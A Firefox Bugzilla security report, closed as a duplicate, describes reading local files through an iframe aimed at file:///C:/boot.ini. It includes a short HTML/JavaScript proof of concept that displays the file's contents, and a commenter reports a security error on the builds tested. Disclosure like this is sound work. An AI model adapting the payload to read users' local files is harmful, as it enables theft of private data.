Closed
Bug 354059
Opened 18 years ago
Closed 18 years ago
Directory listing and file content stealing via iframes.
Categories
(Firefox :: Security, defect)
Firefox
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 230606
People
(Reporter: t3st3r, Unassigned)
References
()
Details
Attachments
(1 file)
476 bytes,
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 I'd detected iframe-based code which is capable to steal either directory listing or even given file content.This is unfair. Example tested by me: (based on http://www.gnucitizen.org/blog/web-pages-from-hell) <html> <body> <iframe src="file:///C:/boot.ini" onload="getContent(this)"></iframe> <script> function getContent(iframe) { var content = ''; if (iframe.contentDocument) { content = iframe.contentDocument.body.innerHTML; } else if (iframe.contentWindow) { content = iframe.contentWindow.document.body.innerHTML; } else if (iframe.document) { content = iframe.document.body.innerHTML; } alert(content); } </script> </body> </html> Reproducible: Always Steps to Reproduce: 1. You should have C:\boot.ini file (definitely means NT-based OS here), you can use another file name though. 2. Write down given code to something.html 3. Open this page in browser Result: Alert() messagebox appears with file content. Actual Results: Directory listings and file data could be accessed by browser without user's consent.Browser can send private\confidential data without user's consent. Expected Results: Such actions surely should be denied by browser security checks.Othervice browser can act as trojan horse\data thief. All credits to http://www.gnucitizen.org/blog/web-pages-from-hell - I'm just rechecked if this works for my Firefox.It is :(
Comment 1•18 years ago
|
||
I got a security error for 1.8.0.7, 1.8, 1.9 on winxp...
Comment 2•18 years ago
|
||
*** This bug has been marked as a duplicate of 230606 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•